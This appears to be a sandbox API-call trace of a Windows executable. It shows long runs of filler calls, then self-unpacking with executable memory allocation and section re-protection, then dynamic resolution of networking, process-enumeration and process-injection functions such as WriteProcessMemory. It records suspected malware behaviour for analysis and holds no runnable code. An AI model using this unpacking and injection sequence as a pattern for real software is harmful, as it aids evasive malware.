	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.573] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.574] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.575] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.575] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.576] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x765a0000
	[0070.577] LoadLibraryA (lpLibFileName="k") returned 0x0
	[0070.579] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.579] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.579] LoadLibraryW (lpLibFileName="eappcfg.dll") returned 0x6ffa0000
	[0070.581] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.581] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x1d0000
	[0070.582] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x765a0000
	[0070.661] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0070.661] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0070.661] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0070.661] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x1e0000
	[0070.661] VirtualAlloc (lpAddress=0x0, dwSize=0x32e00, flAllocationType=0x1000, flProtect=0x4) returned 0x480000
	[0070.666] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x19fefc | out: lpflOldProtect=0x19fefc*=0x2) returned 1
	[0070.666] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19fefc | out: lpflOldProtect=0x19fefc*=0x4) returned 1
	[0070.666] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x20) returned 1
	[0070.683] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x20, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0070.683] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0070.683] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0070.683] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0070.686] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0070.686] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0070.686] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0070.686] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x8) returned 1
	[0070.686] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x4) returned 1
	[0070.686] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0
	[0070.686] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x702b0000
	[0070.753] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="HttpQueryInfoA") returned 0x70351880
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetQueryOptionA") returned 0x70357d00
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetSetOptionA") returned 0x70351dc0
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersA") returned 0x7032c3f0
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetCloseHandle") returned 0x7037d200
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="HttpSendRequestA") returned 0x70378e60
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetConnectA") returned 0x703f0da0
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetReadFile") returned 0x70337320
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersW") returned 0x7032bec0
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="InternetOpenW") returned 0x70378490
	[0070.754] GetProcAddress (hModule=0x702b0000, lpProcName="HttpOpenRequestW") returned 0x70330fd0
	[0070.755] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.755] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0070.755] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="PathFindFileNameW") returned 0x74b37a50
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrCatW") returned 0x74b484a0
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyW") returned 0x74b484e0
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpIW") returned 0x74b34750
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyNW") returned 0x74b433f0
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrA") returned 0x74b43570
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrDupW") returned 0x74b39060
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrIW") returned 0x74b381b0
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrRChrW") returned 0x74b3d1c0
	[0070.755] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpW") returned 0x74b35fe0
	[0070.755] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.756] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x0
	[0070.756] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x772c0000
	[0070.757] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.757] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessImageFileNameA") returned 0x772c16a0
	[0070.757] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.757] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.757] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.757] GetProcAddress (hModule=0x77960000, lpProcName="_chkstk") returned 0x779da570
	[0070.757] GetProcAddress (hModule=0x77960000, lpProcName="RtlAllocateHeap") returned 0x77992bd0
	[0070.760] GetProcAddress (hModule=0x77960000, lpProcName="RtlFreeHeap") returned 0x77990230
	[0070.760] GetProcAddress (hModule=0x77960000, lpProcName="memset") returned 0x779dcfe0
	[0070.760] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.761] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x0
	[0070.761] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x701e0000
	[0070.764] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.764] GetProcAddress (hModule=0x701e0000, lpProcName="CreateEnvironmentBlock") returned 0x701e4480
	[0070.764] GetProcAddress (hModule=0x701e0000, lpProcName="GetProfilesDirectoryW") returned 0x701e45a0
	[0070.764] GetProcAddress (hModule=0x701e0000, lpProcName="DestroyEnvironmentBlock") returned 0x701e4510
	[0070.764] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.764] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x0
	[0070.764] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x746c0000
	[0070.780] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0070.780] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0070.780] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.780] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0
	[0070.780] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x70210000
	[0070.782] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.782] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryDataAvailable") returned 0x702347a0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReceiveResponse") returned 0x7021c8e0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpen") returned 0x70246720
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpAddRequestHeaders") returned 0x70229400
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryHeaders") returned 0x702309c0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReadData") returned 0x70234ea0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpenRequest") returned 0x70248dd0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSetOption") returned 0x702306f0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpCloseHandle") returned 0x70233ad0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSendRequest") returned 0x7023bfd0
	[0070.783] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpConnect") returned 0x70242880
	[0070.783] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.783] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0
	[0070.783] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77490000
	[0070.817] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.818] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0070.819] GetProcAddress (hModule=0x77490000, lpProcName="NetUserGetInfo") returned 0x6ff733a0
	[0070.820] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.821] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0070.821] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtectEx") returned 0x765e2790
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAllocEx") returned 0x765e2730
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineW") returned 0x765baba0
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="CreateMutexW") returned 0x765c66f0
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="Process32NextW") returned 0x765bd290
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="Process32FirstW") returned 0x765bf5a0
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeThread") returned 0x765c4f40
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="WriteProcessMemory") returned 0x765e2850
	[0070.821] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatusEx") returned 0x765bafe0
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="OpenMutexW") returned 0x765c6770
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="MultiByteToWideChar") returned 0x765b2ad0
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageA") returned 0x765bf830
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpiA") returned 0x765b7830
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileAttributesW") returned 0x765c6a50
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="MoveFileExW") returned 0x765bb2b0
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileW") returned 0x765c6ec0
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpW") returned 0x765b7970
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenW") returned 0x765b3690
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemInfo") returned 0x765ba0f0
